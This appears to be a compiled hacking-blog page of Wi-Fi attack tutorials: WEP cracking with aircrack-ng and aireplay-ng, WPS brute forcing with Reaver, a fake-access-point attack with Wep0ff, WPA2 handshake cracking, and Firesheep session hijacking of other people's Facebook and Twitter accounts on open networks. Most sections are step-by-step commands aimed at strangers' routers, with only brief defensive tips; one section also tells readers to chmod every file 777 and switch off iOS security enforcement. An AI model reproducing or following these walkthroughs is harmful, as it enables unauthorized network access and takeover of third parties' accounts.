[WiFi Password Dump] Command-line Tool to Recover Wireless Passwords

WiFi Password Dump is the free command-line tool to quickly recover all the Wireless account passwords stored on your system.

It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information

WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text

Being command-line tool makes it useful for penetration testers and forensic investigators. For GUI version check out the Wi-Fi Password Decryptor.

Wep0ff – Wireless WEP Key Cracker Tool

Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.

It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.

This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use:
1. Setup fake AP with KARMA tools or iwconfig

_______________________________________________________

1. iwpriv ath0 mode 2
2. iwconfig ath0 mode master essid foo enc 1122334455 channel 7
3. echo 1 > /proc/sys/dev/ath0/rawdev
4. echo 1 > /proc/sys/dev/ath0/rawdev_type
5. ifconfig ath0
6. up ifconfig ath0raw up

______________________________________________________

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key

You can download it here:

Wep0ff

How to Crack WPA2 ccmp with Backtrack 5

Hey guys, day before yesterday i made a tutorial on WEP cracking using a build-in tool called "fern wifi cracker". Today i'll show you how to crack WPA2 CCMP using the same tool, so now let us begin..

• Open fern wifi cracker

• Select the wireless interface from the list.

• When you select your card, a window will open.. ignore it... just to OK

• Double click anywhere on the tool to get the settings and then enable the xterm from there. (the window appeared above was just informing you about the "settings")

• Now click on the button with the wifi logo on it, the scanning will start when you click it..

• Now you will be able to see the xterms running WEP & WPA scanning (its using airodump)*in the pic i actually closed the xterm for wep.

• Now click on the button which says "WPA"..when you do that, a window will open..just click the AP from the List and then select a wordlist for the WPA2 CCMP cracking (dictionary attack)

• Select a client which you want to disconnect (deauth) from the AP through the list and now run "Attack"

• After few seconds (or minutes) you can see one xterm appering which is sniffing the AP (actually waiting for the WPA handshake) and another xterm appearing for every 3-4 seconds (this xterm is trying to deauthenticate the client by sending the "Deauth" packet)

• Now when you get the WPA-handshake, the tool will start the dictionary attack automatically and if the password is there in the wordlist then it will be displayed on the window..

Okay, this is it for WPA2 CCMP Cracking, I hope you liked it. :)

______________________________________________________________________________________

WPA/WPA2 Bruteforcing Tool - Pyrit

1) Install Pyrit in Backtrack if you dont have it , here is the tutorial :  http://www.backtrack-linux.org/forums/showthread.php?t=40360

2) Get your Handshake.cap file ! Tutorial here :   http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Screenshots :

Now, Follow the screenshots tutorial from 1 to 7 , make sure you replace " d4rk50ld13r-01.cap " by your Handshake file , and you have an lst wordlist file in /pentest/passwords/wordlists.
I used darkc0de.lst but you can use any wordlist file you want as longest it is placed in the right directory !

Screenshot:

 

Hack WIFI Password on Iphone 3G-3Gs-4G Genuine

VIDEO TUTORIAL> http://www.youtube.com/watch?v=2OhqwrflMI8

easy steps & have fun free Internet on Iphone/Ipod....
1)Install aircrack from this repo:
apt.cloudrepo.com
2) Set EVERY files' permission to 777
3) Open Terminal in WinSCP from /var/
4) enter the following command:
sysctl -w security.mac.proc_enforce=0 security.mac.vnode_enforce=0 /aircrack

5) Go to Ipod mobile
6)Type the following code to activate on the device:
/var/aircrack/aircrack-ng -a 1 /var/aircrack/touch.ivs

If it says killed you didn't do part 4 properly, Good Luck!

(/var/aircrack/aircrack-ng) = the file terminal will open,( -a 1) = the type of encrytption, that is wep, ( /var/aircrack/touch.ivs) = where the packets are saved, this is simply a sample file as it can't capture new packets yet.

NOTE: This DOESN'T work FULLY yet. All this is doing is cracking a sample file supplied with it but can not crack a wifi network on its own yet.

WPA/WPA2 Bruteforcing and Hacking Tool: Reaver

Reaver is a WPA/WPA2 Bruteforcing and hacking Tool. The tool takes advantage of a vulnerability, something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password

 In this tutorial we will explain How To Hack a Secure Wifi Network With Reaver??

First Of all You Must Have Some of the Prerequisites already Installed:

1. You must be running Backtrack Linux.
2. You must have a wireless card capable of raw injection.
3. You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite. 

Now, How To Install Reaver???

Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.

1. Click Applications > Internet > Wicd Network Manager
2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.

Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:

apt-get update

And then, after the update completes:

apt-get install reaver

 If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer.

Find your wireless card: 

Inside Terminal, type:

iwconfig

Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.

Put your wireless card into monitor mode:

 Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:

airmon-ng start wlan0

This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll be mon0, like in the screenshot below. Make note of that.

Find the BSSID of the router you want to crack: 

 Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:

airodump-ng wlan0

(Note: If  airodump-ng wlan0 doesn't work for you, you may want to try the monitor interface instead e.g.,        airodump-ng mon0.)

You'll see a list of the wireless networks in range—it'll look something like the screenshot below:

When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column. (If it's WEP, use our previous guide to cracking WEP passwords.)

Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterfacewith the BSSID and monitor interface and you copied down above:

reaver -i moninterface -b bssid -vv

For example, if your monitor interface was mon0 like mine, and your BSSID was8D:AE:9D:65:1F:B2 (a BSSID I just made up), your command would look like:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:

A few important factors to consider: 

Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.

Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out as Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password.

Hack Facebook and Twitter Password on Wifi Networks

1.Download firesheep Firefox extension.This is a freeware extension for firefox browser.





2. Once installed it will open a sidebar window into your firefox browser.

3.Now it will show all the people who are connected to unsecured wifi network.Once they login into your facebook or twitter account you will get a notification and with a single click you can login into their account.
This whole thing work on the technique of cookie hijacking.Once your session cookie is hacked then anybody can login into your account.These cookies can be easily caputered on unsecured wifi network.

The best way to protect yourself from such a hacking trick is to avoid using your facebook or twitter accounts on unsecured wifi networks as it is a security lapse from the websites not on your side.

Hack wireless work 100%

Today i'm going to show you how to Crack WEP and WPA/WPA2-PSK passwords!

I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.

Let's Begin.

Open up a terminal and type:


Quote:airmon-ng


Spoiler (Click to View)


This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1
Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:
Quote:airodump-ng mon0



When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.


Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0




You should know start recieving DATA.








To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0
After it says it was successfull, type:

Quote:aireplay-ng -3 -b [BSSID] mon0




After a some secondsthis should appear:




When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap
Now, wait for some minutes and it should give you the PASSWORD!

The password is:
Quote:EF855844B288E4BB1BA9ADF14D



PA2-PSK Cracking

Reaver

What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:
Quote:airmon-ng
As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0
After that, type:
Quote:airodump-ng mon0




Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:
Quote:wash -i mon0
If the target AP is vulnerable, it should say:
Quote:WPS Locked: No








Now, to start the attack, type:
Quote:reaver -i mon0 -b [BSSID] -vv



Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:
Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
AND

If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:
Quote:reaver --help
This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:
Quote:WPS PSK: 'PASSWORD HERE'
And here it is!

You should also, remember the PIN.
Quote:WPS PIN: PIN HERE
Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds!

[Router Password Decryptor] Tool to Recover Login/PPPoE/WEP/WPA/WPA2 Passwords from Router/Modem Config file

Router Password Decryptor is the FREE tool to instantly recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file.

Currently it supports password recovery from following type of Routers/Modems:

Cisco
Juniper
DLink
BSNL

In addition to this, it also has unique 'Smart Mode' feature (experimental) to recover passwords from any type of Router/Modem configuration file. It detects various password fields from such config file (XML only) and then automatically try to decrypt those passwords.

It also has quick link to Base64 Decoder which is useful in case you have found Base64 encoded password (ending with =) in the config file and automatic recovery is not working.

It is very easy to use tool with its cool GUI interface. Administrators & Penetration Testers will find it more useful to recover login passwords as well as wireless keys from the router configuration files.

Download Router Password Decryptor v1.0